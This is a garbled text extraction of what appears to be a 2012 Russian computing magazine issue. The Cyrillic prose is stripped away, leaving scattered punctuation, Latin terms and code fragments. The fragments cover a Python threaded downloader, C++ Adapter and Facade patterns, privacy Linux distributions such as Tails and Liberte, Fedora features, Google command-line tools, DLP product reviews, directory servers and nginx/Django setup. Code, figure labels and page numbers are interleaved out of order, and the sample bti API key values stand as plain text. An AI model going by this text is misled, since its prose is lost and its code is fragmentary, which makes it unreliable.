, ,
,
, .
,

098

03 /158/ 2012

, , .
, . ,
,
( , r < 3/pi * R/4) ,
. ,
. ,
R/4 , . , ,
l/2, 12,56 (2 * 3,14 * 4/2). ,
, ,
, !
r < 3/pi * R/4 , ,
.
!
P. S. :
1. ?
2.
?

c , URL (
URL), N . N, , 10.
.
threading,
eventlet, gevent, Twisted .

# URL
urlsPool = Queue.Queue(0)
# URL'
for url in open(sys.argv[-1], 'r'):
urlsPool.put(url)
#
for x in xrange(threads):
DownloadThread().start()
urlsFile.close()

.
, .

. , .

, , . ( ,
):
1. (, ).
2. , .
3. .
4.
.
: , ,
(). . .
, , .

threading:
import
import
import
import

sys
threading
Queue
urllib2

# ,
class DownloadThread(threading.Thread):
def run(self):
#
headers = {'User-Agent' :
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'}
while urlsPool.qsize() > 0:
logfile = open(str(urlsPool.qsize()), 'w')
#
req = urllib2.Request(urlsPool.get(),None,headers)
#
logfile.write(urllib2.urlopen(req).read())
logfile.close()
# ,
if len(sys.argv) < 2:
print 'Usage: downloader.py [-n <number>] FILE\n\
"-n <number>" - number of threads (default 10)'
sys.exit(1)
#
if len(sys.argv) == 4 and sys.argv[1] == '-n':
threads = int(sys.argv[2])
else:
threads = 10

03 /158/ 2012

, .
,
. :
? .

100 . :
I : 900
II : 1000 + 100

:
I : 900 + 100
II : 1000 + 100 100

, 10 1
100/11 1000/11 . ( ):
I : (900 + 100/11) + 1000/11
II : (1000 1000/11) + (100 10/11)

:
I : 909,09 + 90,91
II : 909,09 + 90,91

, !
: ,
, ,
. z

099

deeonis (deeonis@gmail.com)




.
,

.


.
, ,
.
100

,
, . HTML-
,
. ,
, -, -
. , , HTML-
.
, .
, . , HTML-
. , - ,

. ,
, . ,
-, ,
.


, , - , ,
,
. -

03 /158/ 2012

. ,
. ,
, , -
.
, .

( HTML)
//
class IHTMLParser
{
// ...
char* getTags() = 0;
// ...
}
// ,
class HTMLParser : public IHTMLParser
{
// ...
char* getTags() {
//
};
// ...
}
//
IHTMLParser *parser = new HTMLParser();
parser->getTags();

, .
HTMLParser, . , ,
.
ModernHTMLParser,
IHTMLParser. ,
, IHTMLParser, .
.
ModernHTMLParser
class ModernHTMLParser
{
// ...
std::vector<char*> getHtmlTags();
// ...
}
// , IHTMLParser
class HTMLAdapter (ModernHTMLParser &parser):

CLIENT

Adaptee -> specificReqest ()

public IHTMLParser
{
private:
ModernHTMLParser &m_modernParser;
public:
HTMLAdapter(ModernHTMLParser &parser)
{
m_modernParser = parser;
}
char* getTags() {
// ...
m_modernParser.getHtmlTags();
// ...
};
// ...
}
//
ModernHTMLParser &modernParser = new ModernHTMLParser();
IHTMLParser *parser = new HTMLAdapter(modernParser);
parser->getTags();

.
, HTMLAdapter ModernHTMLParser.
,
, .
, . , , , getTags() HTMLParser HTML-,
, getHtmlTags()
ModernHTMLParser , ,
getTags HTMLAdapter .

class HTMLAdapter (ModernHTMLParser &parser):
public IHTMLParser
{
private:
ModernHTMLParser &m_modernParser;
public:
HTMLAdapter(ModernHTMLParser &parser)
{
m_modernParser = parser;
}
char* getTags() {
// ...
vectorOfTags = m_modernParser.getHtmlTags();

TARGET
+request()

ADAPTER
+request()

adaptee

ADAPTEE
specificReqest ()

03 /158/ 2012

101


//
return vector2array(vectorOfTags);

char* getTags() {
// , getHtmlTags(),
//
vectorOfTags = getHtmlTags();
//
return vector2array(vectorOfTags);
};
// ...

};
// ...
}

, , , , .
,
-
. ,
,
.


,
.
. ,
,
.

class HTMLAdapter ():
public HTMLParser, public ModernHTMLParser
{
public:

, ,
HTMLParser, .
HTMLAdapter
, , ,
HTMLParser. , HTMLParser2,
IHTMLParser,
.

, ,
-
.
. ,
.

class SystemClass1
{
void methodA();
// ...
}
class SystemClass2
{
void methodB();
// ...
}
class SystemClass3
{
void methodC();
// ...
}
class Facade (SystemClass1 &sc1,
SystemClass2 &sc2, SystemClass3 &sc3)
{
private:
SystemClass1 &m_sc1;
SystemClass2 &m_sc2;
SystemClass3 &m_sc3;
public:
Facade(SystemClass1 &sc1,
SystemClass2 &sc2, SystemClass3 &sc3)
{
m_sc1 = sc1;
m_sc2 = sc2;
m_sc3 = sc3;
}

C#

102

void method()
{
m_sc1.methodA();

03 /158/ 2012

All the complexity of this entire


sub-system is encapsulated in
a single wrapper class and it's
simple interface
SubsystemOne

SubsystemThree
SubsystemTwoWrapper
+primeTheDirective()

PlasmaConduit

Holodeck

WarpCore
JefferiesTube
DilithiumChamber

Transporter

TurboLift

PhaserBack

Weapon

PhotonTorpedo

m_sc2.methodB();
m_sc3.methodC();
}
}

Facade, HTMLAdapter, . ,
, .
,
. . .
HTMLParser , Facade
.
, , - .
, , , .
, , . .,
, -

03 /158/ 2012

.
, -
.
, .
,
, , . , ,
,
Facade, .
.

: .

.
- , ,

.
, . z

103

UNIXOID

(execbit.ru)


LINUX
,

,

,

.
, ,
, .

, ,
- .
, ,
.
,
,

104

INFO

TrueCrypt,


,
-

.

Haven

,

.

,

200 .

,
. ,
:
,
, .
. ,
/ .
. , -


, .
. ,
,
.
.
,
: Ubuntu Privacy Remix, Privatix, The
Haven Project, Tails Liberte Linux.

03 /158/ 2012


- , ,
,
. ,
,

grsecurity.
,
, , dmesg , root,
chroot-,
/proc,
.
grsecurity ( ,
2010
), .
grsecurity
PaX,
(, ),
.
Liberte Linux,
Hardened Gentoo,
.
SELinux AppArmor
(
, ).

, ( )
.
AppArmor quantOS, , ,
.

-

Liberte Linux

03 /158/ 2012


.
,
-
,
,
. QubesOS,
(
, ][_07_2010).
Liberte


. ,

, ,
.

LiveCD, ,
, RAM-,
. , , ,
.

TrueCrypt LUKS/dm-crypt,

.
,
Ubuntu, Fedora
. Tails (The Amnesiac Incognito Live
System) Liberte Linux,
, .

,
,
.
.
TrueCrypt
. , Haven (www.haven-project.org).

. Privatix

UsbCryptFormat
CryptBackup
.

Ubuntu Privacy
Remix (www.privacy-cd.org),
,
( LAN/WLAN/Bluetooth
). -
GnuPG, Nautilus
,
( Haven
Seahorse).
TrueCrypt-
( )
, (,
, OpenOffice, GnuPG
. .).
- .
,
,
. , Tails MAT (mat.boum.org),

(, . .),
. Haven , ,
,

(

105

UNIXOID

The Amnesiac Incognito Live System

).
Nautilus,
, ,

.
,

.




.
,
. , Ubuntu Privacy Remix
,
Bluetooth -.

Linux, ,

.
,
.
Tor,

,
.
Tor
,
. , Tor
,
?
Tails Haven
: Tor-,

. Liberte
Linux , , ,
,
IP-

106

Haven OS


.
Liberte Linux
:
Tor
(, , torify),
.
IP-,
Tor.
:
DHCP- Tor- HTTP(S)-;
ping ;
VPN-;
, ,

.
DHCP
, ,
ARP IPv4LL .
Wi-Fi, MAC.
, Liberte Linux
MAC-
.



,
: Gnome,
LXDE Fluxbox, Firefox, claws-mail, Abiword . .,

. - .


,
, ,
.

Tails,
, ,
. , -
Tor- Vidalia (www.torproject.org/
projects/vidalia), /
Tor-,
Tor ,
. .
Firefox,
-:
torbutton,
-
JavaScript-, Flash . .;
FireGPG (getfiregpg.org), gpg-
-, ,
;
HTTPS Everywhere (www.eff.org/

WINDOWS

Haven
,
Windows
.

100 ,

. Windows
,
,
, 100 .

,
.

03 /158/ 2012

https-everywhere),
HTTPS, .
Haven,
.
:
RefControl HTTP HTTP-referrer,
, ,
.
CookieSafe
.
AdBlock Plus .
RequestPolicy (
CSRF-).
Perspectives
SSL.
Aircrack-ng
Wi-Fi-
, (,
PWGen Tails). X-chat GPA
(GNU Privacy Assistant: gpa.wald.intevation.org),
SASL (ygrek.org.ua/p/cap_sasl.html)
Tor.
Liberte Linux Figaros Password
Manager 2 (ls.regnet.cz/fpm2/),
AES-256.

(Florence: florence.sf.net), ,
-
. , ,
,
, ,

Tor

03 /158/ 2012

Liberte: Tor

.

Hardened Gentoo,
.
, SSP (
) ASLR ( ).



, .
,
. Haven
,
. ,
, .
Tor, , ( NetworkManager)
Applications Start Network.
Haven
Tor browser bundle (
Firefox Tor) Windows.
(
)
(Application Haven Copy Windows
Tools), ,
. Haven
.
USB-,
Applications Haven
Haven Installer,
. ,
. , Haven

,
(

).
Liberte Linux
.
slock (tools.suckless.org/slock).
.
<Alt + Fx>,
.
Linux SysRq, X- .
Liberte
, .

,
,
iptables,
-.


. , ,
,

.
,
. Cold
boot, ,

/
,
.


, .
, .
-
. z

107

UNIXOID

hatchet
hatchet (maks.hatchet@yandex.ru)

-

FEDORA
Fedora

. Fedora 14
Systemd, Fedora 15 SETUID-
Capabilities,
GRUB2
HAL.
,
UNIX.
Fedora Gnome 3

SYSTEMD
SysV,
UNIX,
,
.

,

.
,

,
,

- , DoS-
.
, cut,
grep, awk . . ,
, .

108


, Systemd,
.

,
.

,
- .
Systemd Fedora 14
, /
. Fedora 16 (
).

CAPABILITIES VS SETUID
SETUID-
. - ping

, . ,
ping SETUID-, root, ,
(RAW) . ,
ping
, ,
ping,
ftp ,
root-.
? SELinux?
, ,

. ,
root, RAW-
?
. , Capabilities!
Capabilities? ,
SETUID, , , ,

03 /158/ 2012

root, , RAW . Capabilities,


ping
RAW-,
, , ,
RAW-. ,
?
Capabilities HP-UX, AIX.
POSIX,
,

Linux 2.6.24.


,
Fedora,

,
UNIX. , /usr/bin,
, , /bin,
/sbin, /usr/sbin, /lib,
/usr/lib. , . , ,
, /bin, /sbin /lib
, , /usr (
NFS).
/usr
,
, , ,
/usr-

Systemd

Fedora btrfs

, , btrf-.
, ,
,
, ,
, , LSB
,

.

(
COW ),
-,

. Fedora 16 GRUB2,
(GRUB /
),
UNICODE .
HAL (Hardware
Abstraction Layer), udev udisks upower,

(
) .
HAL
.
Fedora 16 virt-sandbox, .
selinux-sandbox,
,
libvirt, LXC
QEMU/VirtualBox.
Trusted Boot,

, ,

, .
,
,
.

USB- ,
, , web .
Fedora 14 Spice QEMU.
: ,
,

. z


15- Fedora
firewalld, ,
.

D-BUS, .

firewall-cmd, ,
, IP-
:
$ firewall-cmd --enable --service=ssh
$ firewall-cmd --enable \
--service=samba --timeout=10
$ firewall-cmd --disable \
--service=ipp-client

Capabilities Linux

03 /158/ 2012

Fedora 15 CloudFS,
GlusterFS, . CloudFS
,
Linux-
.
Fedora 15 ,
:
((e)mbedded (m)otherboard)
em0,
em1, em2 . ., ,
PCI, pci1#2,
1 PCI-, 2 .
15- , Fedora btrfs
. Btrfs

109

UNIXOID

(zobnin@gmail.com)

LINUX

, ,
. Gmail,
YouTube, GDocs -,
. -,
?

,
? , -,
Google Chrome OS? , , ,
Plan9,
?
, ,
, ,
.
.
Linux (Ubuntu One),
YouTube
(Totem, ,
),
- ( KDE
Google Gadgets)
-.
,

Linux-.
,

110


-
-. Twitter, ,
,
,
, , .
.
,
. ?
Twitter-.
-
Linux
. Twitter-
Gwibber, , ,
Identi.ca, StatusNet, Facebook, Flickr, Digg,
FriendFeed Qaiku. ,
, , Gnome.

Tyrs Twitter-

03 /158/ 2012

, ,


Pino Hotot.
,
. TweetDeck
Twitter-,
.
Adobe AIR,
. IM-
Pidgin Twitter-
( pidgin-twitter).
, :
.
.
Twitter- ncurses.

Linux- Greg Kroah-Hartman.
bti , , :
$ echo "My current uptime is 'uptime'" | bti

,
,
OAuth-, . (twitter.com/
apps/new) Consumer Key
Consumer Secret bti:
$ vi ~/.bti
# Consumer key
consumer_key=cZy8DdioswAfu3LJYg6E2w
# Consumer secret
consumer_secret=fnIGGU0T12mMWKjmThUdSeKN
32NLWfmnwapwubVQ

bti. ,
PIN.
bti,
access_token_key access_token_
secret, . bti ,

.
YouTube

03 /158/ 2012

Google-

, ,
. Gnome

Totem. KDE4
minitube,
,
-. KDE,

. youtube-viewer,

MPlayer.
youtube-viewer,
,
.

.


( '-t'),
('-a'), - ('-p')
('-M'). '-2', '-3', '-4', '-7', '-1' (240p, 360p,
480p, 720p 1080p ).
'-sub=ru' MPlayer
.
(50 20),
'-m'. youtube-viewer
YouTube.

, MPlayer
.
HD-,
flash-
, MPlayer -
.
,
( , , ). youtube-viewer
videotop, ncurses- vi-
.
:
.
( -

- , ),
. ,
Gmail, CheckGmail Gmail Notifier.


.
Gmail. KDE4
kdeplasma-gmailnotifier. ,
, ( ,
),
, KDE
.
.
sup,

Mutt.
translator, //
, cliweather,
.

, ,
notify-send:
$ notify-send \
'cliweather -'


cron (, ,

).
-

GOOGLE DOCS
FS UBUNTU
$ sudo add-apt-repository ppa:doctormo/ppa
$ sudo apt-get update
$ sudo apt-get install google-docs-fs

111

UNIXOID
GDataCopier, Google Docs.
: gls
, gcp , gmkdir
grm gmv
.
. ,

:
$ gls username@gmail.com:/docs/

PDF :
$ gcp -f pdf \
username@gmail.com:/docs//* /tmp/

$ google calendar add \


', '

3. :
$ google contacts add \
' ,zobnin@gmail.com'

4. Google Docs
( ,
EDITOR):
$ google docs edit --title \
" "

5. Picasa ( ):
$ google picasa create --title \
" " ~/photos/*.jpg

:
6. YouTube:
$ gmkdir \
username@gmail.com:/doc/_

, GoogleCL,
, Blogger,
, (Gmail), Google Docs,
Picasa YouTube ( ).
,
.
1.
Blogger:
$ google blogger post --blog 'Linuxoid' \
--title ' GoogleCL!' --tags 'linux, \
cli' ' GoogleCL, \
bla-bla, bla'

2. :

$ google youtube post --category \


Comedy .avi


Google- (
Gmail) ,

GoogleCL .
.

,
-
. - -

( ,
-)?
Desktop web
application,

Youtube-viewer YouTube

112

-
, .
- Mozilla
Prism (prism.mozillalabs.com), -
,

.
,
,
,
.
( ,

web- ),
.
, Google Chrome

- . -,

, ( /
), !
,


/. ,
,
, Chrome Web Store (
):
$ chromium --app=http://gmail.com




.
-
Firefox. : favicon ,
.
- ,
. ,
,
,
- ,

,
.

,
surf.
surf WebKit,

. , HTML-,

03 /158/ 2012

Sup Mutt- Gmail

.

:
$ surf http://gmail.com

Gmail .
,
.

,
wmctrl:
#!/bin/sh
surf http://gmail.com
wmctrl -r surf -e '0,50,50,400,300'

Gmail surf,
400 x 300
, 50
.

.

-

, -
,

GOOGLE AUTH
Google
,
(),
Google,
.
https://www.google.com/settings,
,

.

03 /158/ 2012

(,
YouTube),
(, )
-.
FUSE: YoutubeFS,
GDataFS, GmailFS, Google Docs FS (
goofs, Java). flickrfs,

flickr.com MetaWeblogFS.

.

,
. , YoutubeFS (code.google.
com/p/youtubefs/) YouTube. ,
. :

# vi /etc/gmailfs/gmailfs.conf
[account]
username = usernamegmail.com
password =
[filesystem]
fsname = linux_fs_4
[logs]
level = INFO
logfile = ~/gmailfs.log


:
$ ./gmailfs.py -o allow_root none \
///

Google Docs FS (code.


google.com/p/google-docs-fs/).

Google Docs. ,
:

$ ./youtubefs.py username@gmail.com \
///

$ gmount /// \
username@gmail.com

- ,
.
. GDataFS (gdatafs.sourceforge.
net),
. :

,
docs.google.com.
, ,
. gumount:

$ gdatafs /// \
username@gmail.com

GmailFS (sr71.net/
projects/gmailfs/) Gmail. IMAP,

( POP/IMAP
IMAP).
/etc/gmailfs/gmailfs.conf
:

$ gumount ///

-
.
.
. -


.
, ,
, . z

113

SYN/ACK
SYN/ACK

grinder (grinder@synack.ru)
00000000\r_NET (0000nline.ru)


. , ,
, .
DLP-,
. ,
, ,
, .
114
0114

INFO

DLP
,


DLP

.

WWW
Ubuntu
MyDLP downloads.medratech.
com/ubuntu.

2012
03
01 /158/
/156/ 2012

Drupal

DLP?
,
. , -
() ,
,
.
. ,
, , ,
. .
,
IM VoIP, ,
, . .
,

.
( , ),
DLP (Data Leak Prevention). - : ILDP
(Information Leak Detection & Prevention), IPC (Information Protection
and Control), ILP (Information Leak Prevention) . ,
-, , .
, , DLP,
, -
DLP. , ,
, ,
.
,
DLP-. :
(SMTP, POP3, IMAP);
IM/VoIP- P2P-;
- ( , , ), HTTP, HTTPS FTP;
(SMB Printing, NCP Printing, LPD, . .);
(USB, CD/DVD, , Bluetooth,
. .), .
(, -, )
( , -

DeviceLock Endpoint DLP Suite

/158/ 2012
2012
03
01 /156/

DLP



. .). , ,
,
.
, DLP-
. , DLP,
. - ,
DLP ( ,
) , , .
, .

WEBSENSE DATA SECURITY SUITE


: websense.com.
: .
: Windows Server 2003 R2.
: Windows Vista, 7, 2003, 2008/R2.
: .
Websense
-, ,
Facebook
.
500
. Websense
DSS .
PreciseID, PortAuthority Technologies,
Websense 2006 . PreciseID . ,

DeviceLock DLP

115
0115

SYN/ACK
SYN/ACK

00000000\r_NET (0000nline.ru)

WEBSENSE DSS




.
400 (
), . PreciseID, : , ,
. .
Websense Deep Content Control
ThreatSeeker ( -
).
: (SMTP), MS Exchange, HTTP/HTTPS, FTP,
IM/MSN. ICAP , .
Websense
(SPAN).
Websense DSS .
,
( ,
), , .
.
- ,

. Websense

,
.

( ) Websense (,

Websense Web Security Gateway).


Active Directory, Novell eDirectory Lotus Domino.
Websense DSS , DLP:
Data Endpoint , , USB ,
, IM . .;
Data Monitor ,
, , , ,
-, ;
Data Protect Data Monitor,
;
Data Discover ,
DSS, , .
Websense
Websense TRITON Console (Java Apache Tomcat).
Websense DSS . MS SQL
Server Express 2008 R2,
. ,
, .

FALCONGAZE SECURETOWER
: falcongaze.ru.
: .
: Windows 2003/2008 (x86/x64).
: Windows XP/Vista/7/2003/2008 (x86/x64).
: .
, OOO .
, , ( , ,
. .).
,
(HTTP/S, FTP/S, POP3/S, SMTP/S, IMAP, OSCAR, , MSN, XMPP).
MS Exchange 2007/2010,
. Skype, SecureTower
, , SMS.

OPENDLP
OpenDLP (code.google.com/p/
opendlp)

,
Windows.
.

Netbios/SMB.
,
Windows
( SMB), *nix- (SSH) (MS
SQL MySQL).
-,

,
116
0116

SSL ( libcurl).
,
.

Perl-
,
, SSN,
,


(Google Docs, Gmail).


.

( ,
)
(
).
,
,
,
,
.
.
0.1
2010-, 0.4.3.
Perl,
Apache
Linux,
MySQL. .

2012
03
01 /158/
/156/ 2012

Drupal

Websense DSS

DLP (
).
: IP , MAC-, ,
, . . MS Word/Excel, PDF
.
, , .
SecureTower ,
, .
, SecureTower,
, ,
, IP-
, . .
,

( Active Directory).
, SecureTower ,
DLP, . ,

,
. ,
. ,
,
, .
SecureTower :
c
( );
,
, ( );
c , , , , .
MS SQL Server,
Oracle, SQLite PostgreSQL. ,
, . -

/158/ 2012
2012
03
01 /156/

Websense Data Security Suite

, ,
Falcongaze SecureTower
Admin Console Falcongaze SecureTower
Client.
, (
, ), , .

DEVICELOCK ENDPOINT DLP SUITE


: devicelock.com/ru.
: .
: Windows NT/2000/XP/2003/Vista/2008/7.
: Windows NT/2000/XP/Vista/7.
: .
DLP,
DeviceLock, .
DeviceLock /
: , , ,
. . DLP,
NetworkLock ( , ) ContentLock (, ).
DeviceLock ,
,
. ,
(
).
. 80
:
,
( , ,
. .), ,
(, , , .). DLP
, , , . (
),
. BitLocker To Go, PGP, TrueCrypt .
,
.
, PrintScreen, .
117
0117

SYN/ACK
SYN/ACK

MyDLP

00000000\r_NET (0000nline.ru)

Falcongaze SecureTower

NetworkLock DPI (Deep Packet


Inspection, ) ,
: -,
, , IM-. : MS
ActiveSync, Palm HotSync iTunes. P2P Skype.
DeviceLock Search Server (DLSS),
.
, .
DeviceLock GroupPolicy Manager.
Active Directory
DeviceLock Enterprise Manager,
LDAP-, DeviceLock Management
Console .
.

MYDLP COMMUNITY EDITION


: mydlp.org.
: GNU GPL.
: Ubuntu 10.04 LTS.
: Windows XP, Vista, 7 (86/64).
: ( ).
DLP- (
Data Loss Prevention)
,
:
HTTP/HTTPS, FTP/FTPS, SMTP, ICAP ( POP/IMAP, MSNMS/Jabber MS Exchange);
txt, MS Word/Excel/Powerpoint 972k3, RTF,
LibreOffice ODF, PDF, PostScript, XML, HTML, ZIP, 7z,
TAR, GZIP, RAR .;
, ( Enterprise );
MIME- Python-Magic,
MD5-;
;
(C/C++/C#/Java/ADA .);
/ ,
;
,
;
118
0118

- (Squid) -,
Postfix, MS Exchange, Zimbra;
ACL IP- .
, MyDLP , ( ).
, MyDLP, :
MyDLP Network ,
TCP- MyDLP.
Erlang Python,
, .
MyDLP Endpoint ,
( 32/64- WinXP-Se7en), : ,
, , . .
MyDLP Security Monitor , ,
.
MyDLP Web UI Network
Endpoint, Web UI, . PHP
Adobe Flex, MySQL.

. Easy, Simple, Open
MyDLP. ,
.
,
. ISO- (
Ubuntu), VMware Ubuntu 10.04 LTS (downloads.
medratech.com/ubuntu).
Enterprise-, , , ,
.

, DLP , ,
. ,
,
, .
,
,
. z

2012
03
01 /158/
/156/ 2012

SYN/ACK

grinder (grinder@synack.ru)

WARNING
FreeIPA
2.1.3
CSRF (CVE2011-3636).

2.1.4.

INFO
FreeIPA


oVirt
,

KVM.


,


.

389DS Active Directory


Windows
Sync.

WWW
389
Directory Server
directory.fedoraproject.org.
GOsa
oss.gonicus.de/labs/
gosa.
Red Hat
IPA redhat.com/
promo/ipa.
FreeIPA freeipa.org.
Mandriva
Directory Server
mds.mandriva.org.

120


,
.
,
.
,
LDAP
Active Directory.


389-ds
389DS

setup-dsadmin.pl.
systemconfig-autentification,
Fedora,
,

FreeIPA.

03 /158/ 2012

Mandriva Management Console

GOsa *nix

389 DIRECTORY SERVER


: directory.fedoraproject.org.
: GNU GPL.
: Fedora/Red Hat/CentOS, Linux (Debian,
Ubuntu, Gentoo), Solaris, HP/UX 11, Irix, AIX, Windows OSF/1.
, Red Hat.
1996 Netscape Directory Server.
Fedora Directory Server ,
2005 Red Hat. 2009
389 Directory Server (389
LDAP). : FDS
Fedora, , , , .
389DS Red Hat Red Hat
Directory Server (RHDS) 24/7. 389DS
LDAPv3, SSL/TLS- SASL, (, ,
) Active Directory ( , Win2k3/2k8
Windows Sync),
(, , IP . .)
NSS Mozilla Project.
389DS (ore Directory
Server, CDS) (Admin Server).
CDS, (389-console)
. Linux (
Java). - Win2k3/2k8 Windows Console.

389DS.
-
, .
read-only ,
Read Only Domain Controller Active Directory Win2k8.
RHEL/Fedora ( CentOS).
, Linux (Debian, Ubuntu, Gentoo),
Solaris, HP/UX 11. Windows,
Irix, AIX OSF/1.

.
389DS GNU GPL, (MPL/
LGPL/GPL/X). , 389DS
FreeIPA
.
.

MANDRIVA DIRECTORY SERVER


: mds.mandriva.org.
: GNU GPL.
: Mandriva, Debian/Ubuntu, CentOS/RHEL/Fedora,
openSUSE, VMware.
Mandriva Directory Server (MDS) ,
,
. ,

FUSIONDIRECTORY
GOsa
,
Gonicus GmbH, ,



,

.
FusionDirectory (fusiondirectory.org).

03 /158/ 2012

,
,
.
2011- FusionDirectory 1.0.2, ,
, -
GOsa
. , ,
, ,
GOsa,
FusionDirectory
.


(Debian, CentOS 5/RHEL 5, Fedora
14/15, openSUSE 11.3/11.4, SLES 11), , ,
,
.

.
Apache2
Lighttpd,
nginx,
.

121

SYN/ACK

FreeIPA

389 Directory Server

LDAP OpenLDAP, 389DS.


PDC ( Windows
NT4), LDAP- , Active Directory
. Windows, Linux Mac OS X.
ACL
Samba, , CUPS,
(Postfix), Squid DNS/
DHCP, GLPI.
Kerberos
(SSO). : , ,
IP-, . .
, ,
Mandriva, MDS .

Zarafa,
, OpenSSH, , .

. MDS , .

MMC agent, Python
XML-RPC.
- MMC (Mandriva
Management Console).
: Normal Expert.
389DS, : Debian,
CentOS/RHEL/Fedora openSUSE,
VMware. , MDS *nix-.
Mandriva Enterprise Server.
MDS , , , MES, -
LDAP.
.

Active Directory , . FreeIPA


, Fedora, 389DS, MIT Kerberos, NTP
BIND. ,
Red Hat,
IPA, Red Hat
2008 .
FreeIPA Fedora 9 ( 2008), Active Directory
.
, .
2009- 2.0.
2011-. ,
, Linux
Fedora 15 Test Day,
FreeIPA2. :
, , ;
, Kerberos, SUDO;
Kerberos ;
Host Based Access Control
LDAP;
(Dogtag Certificate Server).

FREEIPA
: freeipa.org.
: GNU GPL.
: Fedora/CentOS, Linux, AIX, HPUX, Solaris, openSUSE.
FreeIPA (Free Identity, Policy and Audit) Linux- ,

122

, FreeIPA, : , . ,
, FreeIPA (,

-, Java).
, (LDB XML),
. SSSD (System Security
Services Daemon).
Red Hat/Fedora , : AIX,
HP-UX, Solaris, openSUSE. ,
Ubuntu/Debian (launchpad.net/freeipa)
Red Hat.
(certmonger)
, .
DNS- BIND
( LDAP BIND

03 /158/ 2012

APACHE DIRECTORY SERVER


,
Apache Software Foundation (directory.
apache.org). Java,
LDAPv3, Kerberos Change
Password Protocol.
Java-
,
.
LDAP Kerberos,
.
.

Linux, Windows Mac OS X,


ADS
, Java.
LDAP,
, ,
Java
.
Apache.
Apache Directory Studio,
LDAP-, ,
LDIF DSML,
.

Fedora
FreeIPA

GSS-TSIG). Kerberos keytab


.
FreeIPA
.

.
, ,
.
SELinux, Samba, FreeRADIUS,
SSH LVM, OTP
. Red Hat .
FreeIPA Fedora, CentOS,
K12LTSP . ,
2.0 ( gettext
UTF8). install/po ru.po, .
, . 2.1.4 CSRF- (
, CVE-2011-3636).

GOSA2
: oss.gonicus.de/labs/gosa.
: GNU GPL.
: Debian/Ubuntu, RedHat/CentOS/Fedora,
openSUSE/SLES, *nix.
GOsa2,
,

-. *nix Samba, , , , ,
: DHCP, DNS, HTTP, SMTP
. . Gonicus GmbH,
GOsa .
( =
), .
30 , , Squid, DansGuardin,
Postfix, Courier-IMAP, Maildrop, GNARWL, Cyrus-SASL, OpenSSL,
ISC DHCP, WebDAV, PureFTPd, PPTP, Kerberos, Asterisk, Nagios,
OPSI, Netatalk, FAI, rsyslog, :
SOGo, OpenGroupware, Kolab, Scalix.
, .
,
.
( )
.
ACL , , (/) .
: , , , ,
. .
GOsa . ,
, gettext .
Linux. Debian,
. Red Hat/CentOS/Fedora
openSUSE/SLES, , ,
, . -, Apache2
nginx. ,
.

Identity Policy Audit FreeIPA

03 /158/ 2012

, GOsa2.
,
Linux,
.
. z

123

SYN/ACK
SYN/ACK

(execbit.ru)


NGINX DJANGO
-
, nginx, memcached, eaccelerator, hiphop .
, PHP.
Django?
124

03 /158/ 2012


Django memcached .
:
CACHE_BACKEND = memcached://172.19.26.240:11211;172.19.26.242:11212;
172.19.26.244:11213/
Django

, , -
Django. Django? , ,
. Django
Python, .
-- (MVC) , , ,
Django-
. 90% , , ,
(,
-
). SQL,
Python,
.
, ,
. - , ,
-. ,
, nginx,
.
-
nginx - (
).
, nginx
Django. ,
WSGI, Python,
. ,
mod_wsgi nginx,
uWSGI (projects.unbit.it/
uwsgi),
(
: nichol.as/benchmark-of-python-web-servers).
. ,
memcached.
, .
,
HTML-
,
.
, ,
,
. . ,
- .

, ,
. , :

03 /158/ 2012

$ sudo apt-get install nginx memcached python \


python-setuptools mysql-server

MySQL , , PostgreSQL.
Django, uWSGI python-memcached Python.
$ sudo easy_install django uwsgi python-memcached

djohnny-cache,
:
$ sudo easy_install djohnny-cache

NGINX
nginx. . nginx:
$ sudo mv /etc/nginx/{nginx.conf,nginx.conf.old}

:
# vi /etc/nginx/nginx.conf
#
#
worker_processes 4;
#
worker_priority -5;
# gettimeofday(),
#
timer_resolution 100ms;
error_log /var/log/nginx/error.log;
pid
/var/run/nginx.pid;
events {
# ,
#
worker_connections 1024;
# FreeBSD
# use kqueue;
}
http {

DJANGO
PYTHON,

125

SYN/ACK
SYN/ACK

Django

#
include
/etc/nginx/mime.types;
access_log
/var/log/nginx/access.log;
# sendfile()
sendfile
on;
tcp_nopush
off;
# keepalive- 65
keepalive_timeout 65;
# GZIP-
gzip on;
gzip_min_length 1100;
gzip_buffers 64 8k;
gzip_comp_level 3;
gzip_http_version 1.1;
gzip_proxied any;
gzip_types text/plain application/xml
application/x-javascript text/css;
# (
# Debian
include /etc/nginx/sites-enabled/*;
}

:
, ,
memcached .
nginx
.
use kqueue nginx FreeBSD
kqueue epoll.
sendfile() .
, ,
. ,
126

, sendfile() nginx . tcp_nopush nginx


HTTP- , sendfile.
GZIP- .
, ,
,
, .
, , ,
.
:
# vi /etc/nginx/sites-enabled/mysite
server {
#
listen 80;
server_name host.com;

-
ab Apache:
$ ab -kc 500 -n 10000 http://10.1.1.1/
httperf:
$ httperf --hog --server=10.1.1.1 \
--wsess=2000,10,2 --rate 300 --timeout 5

03 /158/ 2012

#
access_log /var/log/nginx/blog-access.log;
error_log /var/log/nginx/blog-error.log;
# , Django
location ^~ /media/ {
root /usr/local/lib/python2.6/dist-packages/
django/contrib/admin;
}
#
location ~* ^.+\.(jpg|jpeg|gif|png|ico|css|zip|tgz|gz
|rar|bz2||pdf|ppt|txt|tar||bmp|js|mov) {
root /var/www/host.com
}
# WSGI-
location / {
uwsgi_pass 127.0.0.1:8012;
include uwsgi_params;
}
}

:
/var/www/host.com uWSGI- 127.0.0.1:8012. Django uWSGI.

DJANGO UWSGI
Django uWSGI
. ,
.

DJANGO 1.3
Django 1.3 --
:
# memcached ( )
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.memcached.
MemcachedCache',
'LOCATION': [
'172.19.26.240:11211',
'172.19.26.242:11211',
]
}
}
#
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.db.
DatabaseCache',
'LOCATION': '_',
}
}

1. Django-:
# cd /var/www
# django-admin.py startproject mysite

import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()

2. :

3. uWSGI- ( -p
):

django.xml
<uwsgi>
<socket>127.0.0.1:8012</socket>
<pythonpath>/var/www/mysite/</pythonpath>
<module>django_wsgi</module>
</uwsgi>

# uwsgi -p 4 -s 127.0.0.1:8012

uWSGI , - /etc/rc.local:

django_wsgi.py
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'

# vi /etc/rc.local
cd /var/www/mysite
uwsgi -p 4 -s 127.0.0.1:8012

--

per-site
caching

per-page
caching

Page-fragment
caching

Python-object
caching

Upstreams caching
(cachings at browswrs
ISP, proxy)
,

